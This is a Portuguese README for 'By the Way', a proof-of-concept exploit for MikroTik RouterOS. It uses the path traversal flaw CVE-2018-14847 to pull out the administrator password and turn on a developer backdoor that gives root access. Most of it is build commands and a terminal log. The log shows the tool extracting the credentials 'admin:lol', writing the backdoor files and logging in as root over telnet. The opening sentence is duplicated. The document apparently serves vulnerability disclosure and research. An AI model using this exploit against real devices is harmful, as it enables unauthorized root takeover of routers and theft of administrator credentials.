
By the Way é um exploit que permite um shell root em dispositivos Mikrotik rodando versões do RouterOS:
By the Way é um exploit que permite obter um shell root em dispositivos Mikrotik rodando versões do RouterOS:
O exploit aproveita a vulnerabilidade de path traversal CVE-2018-14847 para extrair a senha do administrador e criar um pacote "option" para ativar o backdoor do desenvolvedor. Após a exploração, o atacante pode conectar-se via Telnet ou SSH usando o usuário root "devel" com a senha do administrador.
A Mikrotik corrigiu a CVE-2018-14847 em abril. No entanto, até este PoC ser escrito, acredito que não foi divulgado publicamente que o ataque pode ser usado para escrever arquivos. Você pode encontrar o aviso da Mikrotik aqui:
Note que, embora este exploit seja escrito para Winbox, ele pode ser portado para HTTP desde que você tenha conhecimento prévio das credenciais do administrador.
Este PoC depende de:
mkdir build
cd build
cmake ..
make
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
Login failed, incorrect username or password
Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251
╔╗ ┬ ┬ ┌┬┐┬ ┬┌─┐ ╦ ╦┌─┐┬ ┬
╠╩╗└┬┘ │ ├─┤├┤ ║║║├─┤└┬┘
╚═╝ ┴ ┴ ┴ ┴└─┘ ╚╩╝┴ ┴ ┴
[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password:
BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.